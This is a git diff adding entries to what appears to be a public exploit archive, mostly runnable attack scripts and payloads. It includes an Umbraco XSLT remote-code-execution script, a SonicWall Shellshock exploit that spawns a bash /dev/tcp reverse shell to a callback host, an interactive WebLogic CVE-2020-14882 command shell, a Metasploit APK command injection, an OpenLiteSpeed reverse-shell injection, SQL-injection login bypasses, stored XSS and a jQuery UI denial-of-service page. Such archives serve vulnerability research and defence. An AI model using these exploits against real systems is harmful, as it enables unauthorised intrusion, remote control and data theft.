diff --git a/exploits/aspx/webapps/49488.py b/exploits/aspx/webapps/49488.py
new file mode 100755
index 000000000..d9e940c70
--- /dev/null
+++ b/exploits/aspx/webapps/49488.py
@@ -0,0 +1,68 @@
+# Exploit Title: Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated) 
+# Date: 2020-03-28
+# Exploit Author: Alexandre ZANNI (noraj)
+# Based on: https://www.exploit-db.com/exploits/46153
+# Vendor Homepage: http://www.umbraco.com/
+# Software Link: https://our.umbraco.com/download/releases
+# Version: 7.12.4
+# Category: Webapps
+# Tested on: Windows IIS
+# Example: python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c ipconfig
+
+import requests
+import re
+import argparse
+
+from bs4 import BeautifulSoup
+
+parser = argparse.ArgumentParser(prog='exploit.py',
+    description='Umbraco authenticated RCE',
+    formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=80))
+parser.add_argument('-u', '--user', metavar='USER', type=str,
+    required=True, dest='user', help='username / email')
+parser.add_argument('-p', '--password', metavar='PASS', type=str,
+    required=True, dest='password', help='password')
+parser.add_argument('-i', '--host', metavar='URL', type=str, required=True,
+    dest='url', help='root URL')
+parser.add_argument('-c', '--command', metavar='CMD', type=str, required=True,
+    dest='command', help='command')
+parser.add_argument('-a', '--arguments', metavar='ARGS', type=str, required=False,
+    dest='arguments', help='arguments', default='')
+args = parser.parse_args()
+
+# Payload
+payload = """\
+<?xml version="1.0"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:csharp_user="http://csharp.mycompany.com/mynamespace"><msxsl:script language="C#" implements-prefix="csharp_user">public string xml() { string cmd = "%s"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "%s"; proc.StartInfo.Arguments = cmd; proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true;  proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; }  </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/> </xsl:template> </xsl:stylesheet>\
+""" % (args.arguments, args.command)
+
+login = args.user
+password = args.password
+host = args.url
+
+# Process Login
+url_login = host + "/umbraco/backoffice/UmbracoApi/Authentication/PostLogin"
+loginfo = { "username": login, "password": password}
+s = requests.session()
+r2 = s.post(url_login,json=loginfo)
+
+# Go to vulnerable web page
+url_xslt = host + "/umbraco/developer/Xslt/xsltVisualize.aspx"
+r3 = s.get(url_xslt)
+
+soup = BeautifulSoup(r3.text, 'html.parser')
+VIEWSTATE = soup.find(id="__VIEWSTATE")['value']
+VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value']
+UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN']
+headers = {'UMB-XSRF-TOKEN': UMBXSRFTOKEN}
+data = { "__EVENTTARGET": "", "__EVENTARGUMENT": "", "__VIEWSTATE": VIEWSTATE,
+    "__VIEWSTATEGENERATOR": VIEWSTATEGENERATOR,
+    "ctl00$body$xsltSelection": payload,
+    "ctl00$body$contentPicker$ContentIdValue": "",
+    "ctl00$body$visualizeDo": "Visualize+XSLT" }
+
+# Launch the attack
+r4 = s.post(url_xslt, data=data, headers=headers)
+# Filter output
+soup = BeautifulSoup(r4.text, 'html.parser')
+CMDOUTPUT = soup.find(id="result").getText()
+print(CMDOUTPUT)
\ No newline at end of file
diff --git a/exploits/aspx/webapps/49508.txt b/exploits/aspx/webapps/49508.txt
new file mode 100644
index 000000000..ceff22c65
--- /dev/null
+++ b/exploits/aspx/webapps/49508.txt
@@ -0,0 +1,14 @@
+# Exploit Title: H8 SSRMS - 'id' IDOR
+# Date: 01/31/2021
+# Exploit Author: Mohammed Farhan
+# Vendor Homepage: https://www.height8tech.com/
+# Version: H8 SSRMS
+# Tested on: Windows 10
+
+
+Vulnerability Details
+======================
+Login to the application
+Navigate to Payment Section and Click on Print button.
+In QuotePrint.aspx, modify the id Parameter to View User details, Address,
+Payments, Phonenumber and Email of other Users
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49478.txt b/exploits/hardware/webapps/49478.txt
new file mode 100644
index 000000000..3f40b425e
--- /dev/null
+++ b/exploits/hardware/webapps/49478.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Tenda AC5 AC1200 Wireless - 'WiFi Name & Password' Stored Cross Site Scripting
+# Exploit Author: Chiragh Arora
+# Hardware Model: Tenda AC5 AC1200
+# Firmware version: V15.03.06.47_multi
+# Tested on: Kali Linux
+# CVE ID: CVE-2021-3186
+# Date: 25.01.2021
+
+##########################################################################
+
+Steps to Reproduce -
+
+   - Navigate to the Tenda AC1200 gateway with 192.168.0.1 
+   - Follow up to the WiFi Settings and click the “WiFi Name & Password” option there.
+   - Manipulate the WiFi Name with "<script>alert(1)</script>"
+   - Click the “Save” button & as the page refresh, you’ll got an alert stating “1” within it.
+   
+Note: It doesn’t matter which Network Name parameter (2.4 GHz or 5 GHz) you’re manipulating, you’ll encounter the popup over in both of them.
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49499.py b/exploits/hardware/webapps/49499.py
new file mode 100755
index 000000000..52ff8e836
--- /dev/null
+++ b/exploits/hardware/webapps/49499.py
@@ -0,0 +1,105 @@
+# Exploit Title: SonicWall SSL-VPN 8.0.0.0 - 'shellshock/visualdoor' Remote Code Execution (Unauthenticated)
+# Exploit Author: Darren Martyn
+# Vendor Homepage: https://www.home-assistant.io/
+# Version: < SMA 8.0.0.4
+# Blog post: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
+
+#!/usr/bin/python
+# coding: utf-8
+# Author: Darren Martyn
+# Credit: Phineas Fisher
+# Notes:
+# This exploit basically implements the exploits Phineas Fisher used to pwn Hacking Team 
+# and the Cayman Trust Bank place. It uses the Shellshock vulnerability to gain a command
+# execution primitive as the "nobody" user in the cgi-bin/jarrewrite.sh web-script, spawns
+# a trivial reverse shell using /dev/tcp.
+# There is a fairly trivial LPE in these that gets you root by abusing setuid dos2unix, but
+# implementing that is left as an exercise for the reader. I've seen a few approaches, and 
+# would be interested in seeing yours.
+# There is another LPE that works only on some models which I also have removed from this.
+# Details: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
+import requests
+import sys
+import telnetlib
+import socket
+from threading import Thread
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+import time
+
+def banner():
+    print """
+                                                         
+             88                                      88  
+             ""                                      88  
+                                                     88  
+8b       d8  88  ,adPPYba,  88       88  ,adPPYYba,  88  
+`8b     d8'  88  I8[    ""  88       88  ""     `Y8  88  
+ `8b   d8'   88   `"Y8ba,   88       88  ,adPPPPP88  88  
+  `8b,d8'    88  aa    ]8I  "8a,   ,a88  88,    ,88  88  
+    "8"      88  `"YbbdP"'   `"YbbdP'Y8  `"8bbdP"Y8  88  
+                                                         
+                                                         
+                                                         
+             88                                          
+             88                                          
+             88                                          
+     ,adPPYb,88   ,adPPYba,    ,adPPYba,   8b,dPPYba,    
+    a8"    `Y88  a8"     "8a  a8"     "8a  88P'   "Y8    
+    8b       88  8b       d8  8b       d8  88            
+    "8a,   ,d88  "8a,   ,a8"  "8a,   ,a8"  88            
+     `"8bbdP"Y8   `"YbbdP"'    `"YbbdP"'   88   
+    SonicWall SSL-VPN Appliance Remote Exploit
+Public Release (Jan 2021). Author: Darren Martyn. Credit
+goes to Phineas Fisher for this. Stay inside, do crimes.
+    """ 
+
+def handler(lp): # handler borrowed from Stephen Seeley.
+    print "(+) starting handler on port %d" %(lp)
+    t = telnetlib.Telnet()
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.bind(("0.0.0.0", lp))
+    s.listen(1)
+    conn, addr = s.accept()
+    print "(+) connection from %s" %(addr[0])
+    t.sock = conn
+    print "(+) pop thy shell!"
+    t.interact()
+
+def execute_command(target, command):
+    url = target + "/cgi-bin/jarrewrite.sh"
+    headers = {"User-Agent": "() { :; }; echo ; /bin/bash -c '%s'" %(command)}
+    r = requests.get(url=url, headers=headers, verify=False)
+    return r.text
+
+def check_exploitable(target):
+    print "(+) Testing %s for pwnability..." %(target)
+    output = execute_command(target=target, command="cat /etc/passwd")
+    if "root:" in output:
+        print "(*) We can continue, time to wreck this shit."
+        return True
+    else:
+        return False
+
+def pop_reverse_shell(target, cb_host, cb_port):
+    print "(+) Sending callback to %s:%s" %(cb_host, cb_port)
+    backconnect = "nohup bash -i >& /dev/tcp/%s/%s 0>&1 &" %(cb_host, cb_port)
+    execute_command(target=target, command=backconnect)
+
+def hack_the_planet(target, cb_host, cb_port):
+    if check_exploitable(target) == True:
+        pass
+    else:
+        sys.exit("(-) Target not exploitable...")
+    handlerthr = Thread(target=handler, args=(int(cb_port),))
+    handlerthr.start()
+    pop_reverse_shell(target=target, cb_host=cb_host, cb_port=cb_port)
+
+def main(args):
+    banner()
+    if len(args) != 4:
+        sys.exit("use: %s https://some-vpn.lol:8090 hacke.rs 1337" %(args[0]))
+    hack_the_planet(target=args[1], cb_host=args[2], cb_port=args[3])
+
+if __name__ == "__main__":
+    main(args=sys.argv)
\ No newline at end of file
diff --git a/exploits/java/webapps/49479.py b/exploits/java/webapps/49479.py
new file mode 100755
index 000000000..bc4691b9d
--- /dev/null
+++ b/exploits/java/webapps/49479.py
@@ -0,0 +1,88 @@
+# Exploit Title: Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)
+# Google Dork: inurl:"/console/login/LoginForm.jsp"
+# Date: 01/26/2021
+# Exploit Author: CHackA0101
+# Vendor Homepage: https://www.oracle.com/security-alerts/cpuoct2020.html
+# Version: Oracle WebLogic Server, version 12.2.1.0
+# Tested on: Oracle WebLogic Server, version 12.2.1.0 (OS: Linux PDT 2017 x86_64 GNU/Linux)
+# Software Link: https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html
+# CVE : CVE-2020-14882
+
+# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2020-14882/README.md
+
+#!/usr/bin/python3
+
+import requests
+import argparse
+import http.client
+http.client.HTTPConnection._http_vsn=10
+http.client.HTTPConnection._http_vsn_str='HTTP/1.0'
+parse=argparse.ArgumentParser()
+parse.add_argument('-u','--url',help='url')
+args=parse.parse_args()
+
+proxies={'http':'127.0.0.1:8080'}
+cmd_=""
+
+# Headers
+headers = {
+	"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15;rv:73.0)Gecko/20100101 Firefox/73.0",
+	"Accept":"application/json,text/plain,*/*",
+	"Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
+	"Accept-Encoding":"gzip,deflate",
+	"Upgrade-Insecure-Requests":"1",
+	"Content-Type":"application/x-www-form-urlencoded",
+	"Cache-Control":"max-age=0",
+	"Connection":"close"
+}
+
+# Oracle WebLogic Server 12.2.1.0 - Unauthenticated RCE via python Explotation:
+url=args.url+"""/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec();");"""
+url_=args.url+"/console/images/%252E%252E%252Fconsole.portal"
+
+form_data_="""_nfpb=false&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread=(weblogic.work.ExecuteThread)Thread.currentThread();
+weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();
+java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");
+field.setAccessible(true);
+Object obj = field.get(adapter);
+weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);
+String cmd = req.getHeader("cmd");
+String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe","/c", cmd} : new String[]{"/bin/sh","-c", cmd};
+if (cmd != null) {
+    String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\\A").next();
+    weblogic.servlet.internal.ServletResponseImpl res=(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);
+    res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
+    res.getServletOutputStream().flush();
+    res.getWriter().write("");}executeThread.interrupt();");"""
+
+#data_ = parse.urlencode(form_data_)
+results1=requests.get(url,headers=headers)
+
+if results1.status_code==200:
+	print("(Load Headers...)\n")
+	print("(Data urlencode...)\n")
+	print("(Execute exploit...)\n")
+	print("(CHackA0101-GNU/Linux)$ Successful Exploitation.\n")
+	while True:
+		cmd_test = input("(CHackA0101GNU/Linux)$ ")
+		if cmd_test=="exit":
+			break
+		else:
+			try:
+				cmd_ = cmd_test
+				headers = {
+					'cmd': cmd_,
+					'Content-Type':'application/x-www-form-urlencoded',
+					'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36',
+					'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
+					'Connection':'close',
+					'Accept-Encoding':'gzip,deflate',
+					'Content-Length':'1244',
+					'Content-Type':'application/x-www-form-urlencoded'
+				}
+				results_ = requests.post(url_, data=form_data_, headers=headers, stream=True).text
+				print(results_)
+			except:
+				pass
+else:
+	print("(CHackA0101-GNU/Linux)$ Fail.\n")
\ No newline at end of file
diff --git a/exploits/linux/webapps/47138.py b/exploits/linux/webapps/47138.py
index 971baab76..ec31e177a 100755
--- a/exploits/linux/webapps/47138.py
+++ b/exploits/linux/webapps/47138.py
@@ -1,4 +1,4 @@
-# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution
+# Exploit Title: fuel CMS 1.4.1 - Remote Code Execution (1)
 # Date: 2019-07-19
 # Exploit Author: 0xd0ff9
 # Vendor Homepage: https://www.getfuelcms.com/
diff --git a/exploits/multiple/dos/49489.html b/exploits/multiple/dos/49489.html
new file mode 100644
index 000000000..18c9ddb56
--- /dev/null
+++ b/exploits/multiple/dos/49489.html
@@ -0,0 +1,36 @@
+# Exploit Title: jQuery UI 1.12.1 - Denial of Service (DoS)
+# Date: 20 Jan, 2021
+# Exploit Author: Rafael Cintra Lopes
+# Vendor Homepage: https://jqueryui.com/
+# Software Link: https://jqueryui.com/download/
+# Version: <= 1.12.1
+# CVE : CVE-2020-28488
+
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>DoS - jQuery UI 1.12.1</title>
+</head>
+<body>
+    <h2>DoS - jQuery UI 1.12.1</h2>
+
+    <div>
+        <button onclick="exploit()">Exploit</button>
+    </div>
+
+    <p>PoC by Rafael Cintra Lopes</p>
+
+    <script src="https://code.jquery.com/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
+    <script src="https://code.jquery.com/ui/1.12.1/jquery-ui.min.js" integrity="sha256-VazP97ZCwtekAsvgPBSUwPFKdrwD3unUfSGVYrahUqU=" crossorigin="anonymous"></script>
+
+    <script>
+        function exploit(){
+            for (var i = 0; i < 10; i++) {
+                $("div").dialog({title:'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'});
+            }
+        }
+    </script>
+</body>
+</html>
\ No newline at end of file
diff --git a/exploits/multiple/local/49491.py b/exploits/multiple/local/49491.py
new file mode 100755
index 000000000..591921817
--- /dev/null
+++ b/exploits/multiple/local/49491.py
@@ -0,0 +1,49 @@
+# Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template command injection
+# Exploit Author: Justin Steven
+# Vendor Homepage: https://www.metasploit.com/
+# Software Link: https://www.metasploit.com/
+# Version: Metasploit Framework 6.0.11 and Metasploit Pro 4.18.0
+# CVE : CVE-2020-7384
+
+#!/usr/bin/env python3
+import subprocess
+import tempfile
+import os
+from base64 import b64encode
+
+# Change me
+payload = 'echo "Code execution as $(id)" > /tmp/win'
+
+# b64encode to avoid badchars (keytool is picky)
+payload_b64 = b64encode(payload.encode()).decode()
+dname = f"CN='|echo {payload_b64} | base64 -d | sh #"
+
+print(f"[+] Manufacturing evil apkfile")
+print(f"Payload: {payload}")
+print(f"-dname: {dname}")
+print()
+
+tmpdir = tempfile.mkdtemp()
+apk_file = os.path.join(tmpdir, "evil.apk")
+empty_file = os.path.join(tmpdir, "empty")
+keystore_file = os.path.join(tmpdir, "signing.keystore")
+storepass = keypass = "password"
+key_alias = "signing.key"
+
+# Touch empty_file
+open(empty_file, "w").close()
+
+# Create apk_file
+subprocess.check_call(["zip", "-j", apk_file, empty_file])
+
+# Generate signing key with malicious -dname
+subprocess.check_call(["keytool", "-genkey", "-keystore", keystore_file, "-alias", key_alias, "-storepass", storepass,
+                       "-keypass", keypass, "-keyalg", "RSA", "-keysize", "2048", "-dname", dname])
+
+# Sign APK using our malicious dname
+subprocess.check_call(["jarsigner", "-sigalg", "SHA1withRSA", "-digestalg", "SHA1", "-keystore", keystore_file,
+                       "-storepass", storepass, "-keypass", keypass, apk_file, key_alias])
+
+print()
+print(f"[+] Done! apkfile is at {apk_file}")
+print(f"Do: msfvenom -x {apk_file} -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null")
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49483.txt b/exploits/multiple/webapps/49483.txt
new file mode 100644
index 000000000..e1dd5cd8b
--- /dev/null
+++ b/exploits/multiple/webapps/49483.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated)
+# Date: 26/1/2021
+# Exploit Author: cmOs - SunCSR
+# Vendor Homepage: https://openlitespeed.org/
+# Software Link: https://openlitespeed.org/kb/install-from-binary/
+# Version: 1.7.8
+# Tested on Windows 10
+
+
+Step 1: Log in to the dashboard using the Administrator account.
+Step 2 : Access Server Configuration > External App > Command
+Step 3: Set "Start By Server *" Value to "Yes (Through CGI Daemon)
+Step 4 : Inject payload "fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1'" to "Command" value
+Step 5: Graceful Restart
+
+[POC]
+
+POST /view/confMgr.php HTTP/1.1
+Host: target:7080
+Connection: close
+Content-Length: 579
+Accept: text/html, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: https://target:7080
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: https://target:7080/index.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: LSUI37FE0C43B84483E0=b8e3df9c8a36fc631dd688accca82aee;
+litespeed_admin_lang=english; LSID37FE0C43B84483E0=W7zzfuEznhk%3D;
+LSPA37FE0C43B84483E0=excYiZbpUS4%3D
+
+name=lsphp&address=uds%3A%2F%2Ftmp%2Flshttpd%2Flsphp.sock&note=&maxConns=10&env=PHP_LSAPI_CHILDREN%3D10%0D%0ALSAPI_AVOID_FORK%3D200M&initTimeout=60&retryTimeout=0&persistConn=1&pcKeepAliveTimeout=&respBuffer=1&autoStart=2&path=fcgi-bin%2Flsphp5%2F..%2F..%2F..%2F..%2F..%2Fbin%2Fbash+-c+'bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.17.52%2F1234+0%3E%261'&backlog=100&instances=0&extUser=&extGroup=&umask=&runOnStartUp=3&extMaxIdleTime=&priority=0&memSoftLimit=2047M&memHardLimit=2047M&procSoftLimit=1400&procHardLimit=1500&a=s&m=serv&p=ext&t=A_EXT_LSAPI&r=lsphp&tk=0.08677800+1611561077
\ No newline at end of file
diff --git a/exploits/php/webapps/48515.py b/exploits/php/webapps/48515.py
index 7725a1173..eb4e98818 100755
--- a/exploits/php/webapps/48515.py
+++ b/exploits/php/webapps/48515.py
@@ -1,4 +1,4 @@
-# Title: OpenEMR 5.0.1 - Remote Code Execution
+# Title: OpenEMR 5.0.1 - Remote Code Execution (1)
 # Exploit Author: Musyoka Ian
 # Date: 2020-05-25
 # Title: OpenEMR < 5.0.1 - Remote Code Execution
diff --git a/exploits/php/webapps/49294.txt b/exploits/php/webapps/49294.txt
deleted file mode 100644
index c239fd3c3..000000000
--- a/exploits/php/webapps/49294.txt
+++ /dev/null
@@ -1,37 +0,0 @@
-# Exploit Title: Wordpress Plugin Contact Form 7 5.3.1 - Unrestricted File Upload
-# Date: 12/20/2020
-# Exploit Author: Ramón Vila Ferreres (@ramonvfer)
-# Vendor Homepage: https://contactform7.com
-# Software Link: https://wordpress.org/plugins/contact-form-7/
-# Version: 5.3.1 and below
-# Tested on: Windows 10 1909, Ubuntu 20.4
-
-Explanation
----------------------------------------------------------------------
-ContactForm7 version 5.3.1 and below doesn't properly sanitize 
-uploaded filenames to prevent Arbitrary File Upload that can lead
-to full server takeover in the worst-case scenario.
-
-This happens in the wpcf7_antiscript_file_name function, that fails
-to sanitize the provided filename if it ends with any Unicode special
-character ranging from U+0000 (null) to U+001F (us).
-
-The function matches both the file name and the file extension against
-an exclusion regex. Appending any unicode special character to the 
-file extension results in a complete bypass of this verification (as
-the regex doesn't match) leading to the Unrestricted File Upload.
-
-Exploit
----------------------------------------------------------------------
-1. Change the file extension of the file you want to upload (e.g: 
-"shell.php") to its equivalent with the special character ending (in
-this case "shell.php" (appended U+0000))
-
-2. Upload the file using ContactForm7 file upload feature in the 
-target website.
-
-3. Go to <target.com>/wp-content/uploads/wpcf7_uploads/shell.php
-Note the special character at the end
-Note that the file upload location may vary as it is configurable.
-
-4. Now you have uploaded your file!
\ No newline at end of file
diff --git a/exploits/php/webapps/49468.txt b/exploits/php/webapps/49468.txt
index f66b049f4..76e622687 100644
--- a/exploits/php/webapps/49468.txt
+++ b/exploits/php/webapps/49468.txt
@@ -4,6 +4,7 @@
 # Vendor Homepage: https://collabtive.o-dyn.de/
 # Version: 3.1
 # Tested on: Windows & XAMPP
+# CVE: CVE-2021-3298
 
 ==> Tutorial <==
 
diff --git a/exploits/php/webapps/49475.txt b/exploits/php/webapps/49475.txt
new file mode 100644
index 000000000..bda375beb
--- /dev/null
+++ b/exploits/php/webapps/49475.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Cemetry Mapping and Information System 1.0 - 'user_email' Sql Injection (Authentication Bypass)
+# Exploit Author: Marco Catalano
+# Date: 2021-01-25
+# Vendor Homepage: https://www.sourcecodester.com/php/12779/cemetery-mapping-and-information-system-using-phpmysqli.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=12779&title=Cemetery+Mapping+and+Information+System+Using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: 1.0
+# Vulnerable parameter: "user_email" (POST method)
+# Tested on: Linux, PHP/7.4.11
+
+Explaination:
+The userAuthentication function defined in "/include/accounts.php" implements the following code:
+
+$mydb->setQuery("SELECT * FROM `tbluseraccount` WHERE `U_USERNAME` = '". $U_USERNAME ."' and `U_PASS` = '". $h_pass ."'");
+
+which is called when trying to log into the administrative panel at "/admin/login.php".
+
+Proof Of Concept:
+
+The user input is not properly sanitized and this leads to authentication bypass through the classic "<username>' or '1' = '1 -- -" where <username> has to be a valid username. For example, the default username is "janobe".
+
+
+POST /admin/login.php?logout=1 HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 69
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/admin/login.php?logout=1
+Cookie: wp-settings-time-1=1611158502; PHPSESSID=ujhslpm8cg18eeb1jd7nempudj
+Upgrade-Insecure-Requests: 1
+
+user_email=janobe%27+or+%271%27+%3D+%271--+-&user_pass=test&btnLogin=
\ No newline at end of file
diff --git a/exploits/php/webapps/49476.txt b/exploits/php/webapps/49476.txt
new file mode 100644
index 000000000..016f47f9e
--- /dev/null
+++ b/exploits/php/webapps/49476.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Simple College Website 1.0 - 'name' Sql Injection (Authentication Bypass)
+# Exploit Author: Marco Catalano (@stunn4)
+# Date: 2021-01-25
+# Vendor Homepage: https://www.sourcecodester.com/php/7772/simple-college-website-using-php-and-mysql.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=7772&title=Simple+College+Website+using++PHP%2FMySQLi+with+Source+Code
+# Affected Version: 1.0
+# Vulnerable parameter: "name" (POST method)
+# Tested on: Linux, PHP/7.4.11
+
+Explaination:
+The source of "/admin_pages/login.php" file defines the following lines of code:
+
+$name=$_POST['name'];
+$password=$_POST['password'];
+$result=mysqli_query($conn,"SELECT * FROM users WHERE name='$name' AND Password='$password'");
+
+which are called when trying to log into the administrative panel at "/admin_pages/login.php" itself.
+
+Proof Of Concept:
+
+The user input is not properly sanitized and this leads to authentication bypass through the classic "<username>' or '1' = '1 -- -" where <username> has to be a valid username. For example, the default username is "florian".
+
+
+POST /admin_pages/login.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 66
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/admin_pages/login.php
+Cookie: wp-settings-time-1=1611158502; PHPSESSID=ujhslpm8cg18eeb1jd7nempudj
+Upgrade-Insecure-Requests: 1
+
+name=florian%27+or+%271%27+%3D+%271+--+-&password=test&login=Login
\ No newline at end of file
diff --git a/exploits/php/webapps/49477.txt b/exploits/php/webapps/49477.txt
new file mode 100644
index 000000000..045034129
--- /dev/null
+++ b/exploits/php/webapps/49477.txt
@@ -0,0 +1,48 @@
+# Exploit Title: Simple College Website 1.0 - 'full' Stored Cross Site Scripting
+# Exploit Author: Marco Catalano (@stunn4)
+# Date: 2021-01-25
+# Vendor Homepage: https://www.sourcecodester.com/php/7772/simple-college-website-using-php-and-mysql.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=7772&title=Simple+College+Website+using++PHP%2FMySQLi+with+Source+Code
+# Affected Version: 1.0
+# Vulnerable parameter: "full" (POST method)
+# Tested on: Linux, PHP/7.4.11
+
+Explaination:
+The source of "/admin_pages/admission.php" file defines the following lines of code:
+
+if (isset($_POST['add'])&&!empty($_POST['full'])) {
+    $full=$_POST['full'];
+    $query=mysqli_query($conn,"UPDATE `contents` SET `full_contents`='$full'  WHERE `id`='2'");
+    if ($query) {
+        echo "<b style='color:white;'>Page changed..!</b>";
+    } else if(!$query){
+        echo "<b style='color:white;'>Page is not changed..!</b>";
+    }
+}
+
+
+which allow to an authenticated administrator to modify the source code of the page.
+Every change is then reflected and the user-input is not properly sanitized, this leads to cross site scripting attacks.
+An attacker may try to gain access to the admin panel using authentication bypass through sql injection exploit.
+
+Proof Of Concept:
+The attacker is logged into the administrator panel and modifies the source code of admission.php page to inject javascript code as it follows:
+
+
+POST /admin_pages/admission.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 71
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/admin_pages/admission.php
+Cookie: wp-settings-time-1=1611158502; PHPSESSID=ujhslpm8cg18eeb1jd7nempudj
+Upgrade-Insecure-Requests: 1
+
+full=<script>alert("xss+PoC+by+stunn4")%3b</script>&add=Update+Contents
+
+The XSS payload is stored in the database, so a victim would browse http://127.0.0.1/admission.php and execute the XSS payload.
\ No newline at end of file
diff --git a/exploits/php/webapps/49484.txt b/exploits/php/webapps/49484.txt
new file mode 100644
index 000000000..c7a7c6e7e
--- /dev/null
+++ b/exploits/php/webapps/49484.txt
@@ -0,0 +1,12 @@
+# Exploit Title: EgavilanMedia PHPCRUD 1.0 - 'Full Name' Stored Cross Site Scripting
+# Exploit Author: Mahendra Purbia
+# Vendor Homepage: http://egavilanmedia.com
+# Software Link: https://egavilanmedia.com/crud-operation-with-php-mysql-bootstrap-and-dompdf/
+# Version: 1.0
+# Tested on: Windows 10
+
+Vulnerable Parameters: Full Name
+Steps for reproduce:
+ 1. go to http://localhost/PHPCRUD/
+ 2. now click on "add new record" and fill the details (in first name name use :"><svg onload=alert(1)// )
+ 3. Now reload the page and you will see that our XSS payload executed . Its an Stored XSS.
\ No newline at end of file
diff --git a/exploits/php/webapps/49485.rb b/exploits/php/webapps/49485.rb
new file mode 100755
index 000000000..c456b2cb1
--- /dev/null
+++ b/exploits/php/webapps/49485.rb
